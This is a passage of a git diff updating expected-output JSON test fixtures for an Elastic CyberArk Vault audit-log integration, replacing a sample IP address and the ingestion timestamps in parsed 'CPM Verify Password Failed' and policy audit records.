Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "4", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -1701,11 +1624,11 @@ "retries_count": "4", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615888216", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -1718,9 +1641,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493938Z", - "original": "\u003c7\u003e1 2021-03-16T09:50:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 02:50:19\",\"IsoTimestamp\":\"2021-03-16T09:50:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", + "ingested": "2021-12-09T13:37:01.193677300Z", + "original": "\u003c7\u003e1 2021-03-16T09:50:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 02:50:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T09:50:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 02:50:19\",\"IsoTimestamp\":\"2021-03-16T09:50:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json index f1dcee5a31a..3fecfee889a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-385-blservice-audit-record.log-expected.json @@ -58,7 +58,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024603900Z", + "ingested": "2021-12-09T13:37:03.416577Z", "original": "\u003c5\u003e1 2021-03-11T16:31:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:13\",\"IsoTimestamp\":\"2021-03-11T16:31:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: False; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -122,7 +122,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024616700Z", + "ingested": "2021-12-09T13:37:03.416585700Z", "original": "\u003c5\u003e1 2021-03-11T16:31:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:31:23\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:31:23Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:31:23\",\"IsoTimestamp\":\"2021-03-11T16:31:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: True; RequireReason: AllowFreeTextReason: True, 